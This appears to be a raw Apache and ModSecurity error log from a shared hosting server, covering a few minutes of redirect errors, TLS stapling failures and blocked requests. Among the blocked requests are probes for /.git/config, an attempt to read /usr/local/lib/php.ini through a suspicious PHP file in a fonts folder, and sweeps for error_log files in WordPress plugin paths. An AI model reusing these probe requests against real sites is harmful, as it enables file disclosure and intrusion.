[Mon May 11 16:46:51.392191 2026] [core:error] [pid 1412074:tid 1412100] [client 5.255.103.213:54600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.463032 2026] [core:error] [pid 1416109:tid 1416144] [client 5.255.103.213:54496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.463065 2026] [core:error] [pid 1416109:tid 1416144] [client 5.255.103.213:54496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.463258 2026] [core:error] [pid 1411201:tid 1411264] [client 5.255.103.213:54480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.463478 2026] [core:error] [pid 1411201:tid 1411264] [client 5.255.103.213:54480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.466058 2026] [core:error] [pid 1412074:tid 1412076] [client 5.255.103.213:54530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.466275 2026] [core:error] [pid 1412074:tid 1412076] [client 5.255.103.213:54530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.472132 2026] [core:error] [pid 1411099:tid 1411113] [client 5.255.103.213:54524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:51.472280 2026] [core:error] [pid 1411099:tid 1411113] [client 5.255.103.213:54524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:52.110395 2026] [core:error] [pid 1411099:tid 1411120] [client 5.255.103.213:54550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:46:52.110431 2026] [core:error] [pid 1411099:tid 1411120] [client 5.255.103.213:54550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:47:02.136902 2026] [security2:error] [pid 1424905:tid 1424930] [client 43.153.86.78:43572] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agHr5oW8yzYoWG_eyCWfpAAAAVY"]
[Mon May 11 16:47:02.563817 2026] [security2:error] [pid 1411201:tid 1411253] [client 34.77.71.175:35308] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHr5vy_GXSWIKeli0v6PwAAAIc"]
[Mon May 11 16:47:02.564185 2026] [security2:error] [pid 1411201:tid 1411253] [client 34.77.71.175:35308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHr5vy_GXSWIKeli0v6PwAAAIc"]
[Mon May 11 16:47:02.564690 2026] [core:error] [pid 1411201:tid 1411253] [client 34.77.71.175:35308] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:47:02.565446 2026] [security2:error] [pid 1411201:tid 1411253] [client 34.77.71.175:35308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.git/config"] [unique_id "agHr5vy_GXSWIKeli0v6PwAAAIc"]
[Mon May 11 16:47:06.806088 2026] [security2:error] [pid 1416109:tid 1416146] [client 43.153.86.78:47904] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agHr6lV4kyjgo4bQBUhcvwAAANA"], referer: http://www.castiglionecf.com
[Mon May 11 16:47:15.006787 2026] [security2:error] [pid 1411055:tid 1411066] [client 43.153.86.78:59934] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHr80WKUxpmnkK7zHyEWgAAAQk"], referer: https://www.castiglionecf.com/
[Mon May 11 16:47:16.189655 2026] [security2:error] [pid 1416109:tid 1416129] [client 216.73.216.110:58889] ModSecurity: Warning. Matched phrase "usr/local/lib/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: usr/local/lib/php.ini found within ARGS:filesrc: /usr/local/lib/php.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHr9FV4kyjgo4bQBUhcwwAAAMA"]
[Mon May 11 16:47:16.190334 2026] [security2:error] [pid 1416109:tid 1416129] [client 216.73.216.110:58889] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHr9FV4kyjgo4bQBUhcwwAAAMA"]
[Mon May 11 16:47:16.299444 2026] [security2:error] [pid 1416109:tid 1416129] [client 216.73.216.110:58889] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHr9FV4kyjgo4bQBUhcwwAAAMA"]
[Mon May 11 16:47:24.221565 2026] [ssl:error] [pid 1411055:tid 1411075] (EAI 2)Name or service not known: [client 74.7.228.45:42520] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 16:47:24.221857 2026] [ssl:error] [pid 1411055:tid 1411075] AH01941: stapling_renew_response: responder error
[Mon May 11 16:47:56.399058 2026] [security2:error] [pid 1424905:tid 1424913] [client 43.166.245.120:43708] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHsHIW8yzYoWG_eyCWf1AAAAUU"]
[Mon May 11 16:48:07.883018 2026] [security2:error] [pid 1424905:tid 1424911] [client 43.157.147.3:51996] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agHsJ4W8yzYoWG_eyCWf5AAAAUM"], referer: http://www.missmandarine.com
[Mon May 11 16:48:34.283820 2026] [:error] [pid 1416109:tid 1416135] [client 85.208.96.200:55818] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 16:48:46.275312 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 16:48:47.693852 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 16:48:49.185824 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 16:48:50.743269 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 16:49:07.636568 2026] [proxy_fcgi:error] [pid 1411055:tid 1411075] [client 145.239.10.137:43513] AH01071: Got error 'Primary script unknown', referer: http://la-grande-fabrique.com/motu.php
[Mon May 11 16:49:16.066831 2026] [security2:error] [pid 1416109:tid 1416145] [client 150.109.12.46:34456] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agHsbFV4kyjgo4bQBUhdQAAAAM8"], referer: http://www.culturesvoile.com
[Mon May 11 16:49:16.608198 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/infrastructure/file/error_log
[Mon May 11 16:49:18.131021 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/infrastructure/file/error_log
[Mon May 11 16:49:19.603798 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/infrastructure/file/error_log
[Mon May 11 16:49:21.135797 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/infrastructure/file/error_log
[Mon May 11 16:49:27.251560 2026] [authz_core:error] [pid 1411099:tid 1411105] [client 216.73.216.110:12153] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Nette/error_log
[Mon May 11 16:49:29.168890 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/user-interface/health-check/error_log
[Mon May 11 16:49:30.752343 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/user-interface/health-check/error_log
[Mon May 11 16:49:32.226753 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/user-interface/health-check/error_log
[Mon May 11 16:49:33.872442 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/llms-txt/user-interface/health-check/error_log
[Mon May 11 16:49:35.284244 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 16:49:36.747787 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 16:49:38.264165 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 16:49:39.805115 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 16:49:41.313947 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 16:49:42.723284 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 16:49:44.314446 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 16:49:45.946905 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 16:49:49.922973 2026] [ssl:error] [pid 1424905:tid 1424917] (EAI 2)Name or service not known: [client 192.178.6.7:40959] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:49:49.924621 2026] [ssl:error] [pid 1424905:tid 1424917] AH01941: stapling_renew_response: responder error
[Mon May 11 16:49:50.827913 2026] [ssl:error] [pid 1412074:tid 1412083] (EAI 2)Name or service not known: [client 192.178.6.9:55313] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:49:50.827967 2026] [ssl:error] [pid 1412074:tid 1412083] AH01941: stapling_renew_response: responder error
[Mon May 11 16:50:10.843097 2026] [ssl:error] [pid 1412074:tid 1412098] (EAI 2)Name or service not known: [client 74.7.175.189:36066] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 16:50:10.843251 2026] [ssl:error] [pid 1412074:tid 1412098] AH01941: stapling_renew_response: responder error
[Mon May 11 16:50:20.891907 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/endpoints/error_log
[Mon May 11 16:50:22.383746 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/endpoints/error_log
[Mon May 11 16:50:23.817601 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/endpoints/error_log
[Mon May 11 16:50:25.444920 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/endpoints/error_log
[Mon May 11 16:50:26.878520 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/tasks/error_log
[Mon May 11 16:50:28.333449 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/tasks/error_log
[Mon May 11 16:50:29.803081 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/tasks/error_log
[Mon May 11 16:50:31.446384 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/application/tasks/error_log
[Mon May 11 16:50:32.246773 2026] [security2:error] [pid 1416109:tid 1416138] [client 209.38.97.4:37528] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsuFV4kyjgo4bQBUhdkAAAAMg"]
[Mon May 11 16:50:32.247063 2026] [security2:error] [pid 1416109:tid 1416138] [client 209.38.97.4:37528] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsuFV4kyjgo4bQBUhdkAAAAMg"]
[Mon May 11 16:50:33.942932 2026] [security2:error] [pid 1416109:tid 1416138] [client 209.38.97.4:37528] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHsuFV4kyjgo4bQBUhdkAAAAMg"]
[Mon May 11 16:50:34.547832 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/components/error_log
[Mon May 11 16:50:36.062770 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/components/error_log
[Mon May 11 16:50:36.197425 2026] [security2:error] [pid 1424905:tid 1424931] [client 209.38.97.4:37530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsvIW8yzYoWG_eyCWgdQAAAVc"]
[Mon May 11 16:50:36.197953 2026] [security2:error] [pid 1424905:tid 1424931] [client 209.38.97.4:37530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsvIW8yzYoWG_eyCWgdQAAAVc"]
[Mon May 11 16:50:37.519862 2026] [security2:error] [pid 1424905:tid 1424931] [client 209.38.97.4:37530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHsvIW8yzYoWG_eyCWgdQAAAVc"]
[Mon May 11 16:50:37.626415 2026] [security2:error] [pid 1424905:tid 1424922] [client 209.38.97.4:42372] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsvYW8yzYoWG_eyCWgdgAAAU4"]
[Mon May 11 16:50:37.627005 2026] [security2:error] [pid 1424905:tid 1424922] [client 209.38.97.4:42372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agHsvYW8yzYoWG_eyCWgdgAAAU4"]
[Mon May 11 16:50:37.627870 2026] [security2:error] [pid 1424905:tid 1424922] [client 209.38.97.4:42372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agHsvYW8yzYoWG_eyCWgdgAAAU4"]
[Mon May 11 16:50:37.660739 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/components/error_log
[Mon May 11 16:50:39.132819 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/components/error_log
[Mon May 11 16:50:46.755923 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 16:50:48.246071 2026] [authz_core:error] [pid 1411099:tid 1411118] [client 62.113.117.240:50468] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
